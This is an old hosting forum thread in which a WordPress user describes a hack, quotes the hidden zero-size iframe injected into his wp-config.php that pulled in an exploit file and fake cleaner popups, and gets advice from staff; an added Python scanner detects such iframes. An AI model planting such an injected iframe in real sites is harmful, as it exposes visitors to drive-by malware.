Full Version: Site Was Hacked
Banagor
Hey there,

I emailed you guys about it but I figure others might want to know.

My WP site was hacked a few days ago.

What was happening was that when you'd hit the site with Safari or even Firefox, it would try to download a file called xpl.wmf. It also would give pop-up messages about downloading a "disk cleaner" whenever you hit the admin menu.

I finally tracked down the culprit. My wp-config.php file had been modified. At the very end of the file was the following line:

CODE
<iframe src="http://ltds.biz/go.php?id=1874&user_name=ziggen" width=0 height=0></iframe>


Which, as you can see, is bringing something up. Anyway, I made a copy of the offending file, erased it and re-upped it. Everything (so far as I can see) is now working as it should.

The problem was, however, that my files were not writable. So I have no idea how they got to it or re-wrote it to include that line at the end. It must have happened only two days ago as the file date was modified on 11/19/06, and I only noticed it happening yesterday. I didn't have time to try to track it down until today though.

Any others experienced with this sort of thing? I'd love to know. Also, not sure if this is in the right forum but I figured maybe everyone should know in case there are others out there with the same problem.
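
Added example, not part of the original thread: a Python check for the symptom described in this post, listing web files that contain a zero-size iframe like the one appended to wp-config.php, newest modification first. The function names, the extension list and the sample files built in `demo()` are assumptions constructed for illustration.

```python
import os
import re
import tempfile
import time

# Zero-width or zero-height <iframe>, quoted or not, as in the injected line above.
HIDDEN_IFRAME = re.compile(
    rb"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?0(?:px)?[\"']?(?=[\s>/])[^>]*>", re.I)
SRC_ATTR = re.compile(rb"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
EXTENSIONS = (".php", ".html", ".htm", ".js", ".tpl")  # assumed list of served file types


def scan_webroot(root, modified_within_days=None):
    """Return one dict per hidden iframe, most recently modified file first."""
    cutoff = None
    if modified_within_days is not None:
        cutoff = time.time() - modified_within_days * 86400
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            mtime = os.path.getmtime(path)
            if cutoff is not None and mtime < cutoff:
                continue  # older than the window being investigated
            with open(path, "rb") as fh:  # bytes: tampered files may not be valid UTF-8
                for lineno, line in enumerate(fh, 1):
                    tag = HIDDEN_IFRAME.search(line)
                    if tag:
                        src = SRC_ATTR.search(tag.group(0))
                        url = src.group(1).decode("latin-1") if src else ""
                        hits.append({"path": path, "line": lineno,
                                     "mtime": mtime, "src": url})
    return sorted(hits, key=lambda h: h["mtime"], reverse=True)


def demo():
    """Scan a constructed web root: one tampered config, one legitimate embed."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write("<?php\n// constructed sample\n?>\n"
                 '<iframe src="http://injected.example/go.php" width=0 height=0></iframe>\n')
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write('<iframe src="http://video.example/v" width=560 height=315></iframe>\n')
    return scan_webroot(root, modified_within_days=7)

if __name__ == "__main__":
    print(demo())
```

Modification times can be reset by whoever wrote the file, so also run the scan without `modified_within_days` to cover files whose timestamps look old.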
TCH-Bruce
What version of Wordpress are you running?
Banagor
I was on 2.0.4 and upgraded to 2.0.5 while I was tracking this problem.
TCH-Bruce
Version 2.0.5 did have some security-related updates in it. Not sure if that was the reason you were hacked or not but staying current is always a plus.

You should open a ticket with the help desk and ask if they could check the logs.
TCH-Thomas
Also, always use a strong password which you change from time to time.
Banagor
Nah it's okay. I just wanted you guys to be aware of the situation. I didn't think I'd find it that fast though. But it was simply a matter of finding which file had been recently edited.

BTW, what's up with you guys not being on MSN or on AIM anymore? Did I miss something? I blog very...rarely...so I never really check up on things here unless there's some sort of a problem.
Head Guru
Last time I checked, I was on AOL / MSN nearly 20 hours per day.

Also looking at staff, I see:

tchgurumikej online
tchgurucarl online
tchgurutina online
tchguruandy online

Banagor
Hmmm...I'll check it out then. Sorry about that. The only time I'd ever use it is if there was a problem though. Again, I don't pay much attention most of the time to my site or anything else. I get a bit busy RL and this is sort of on the back burner for most of the time.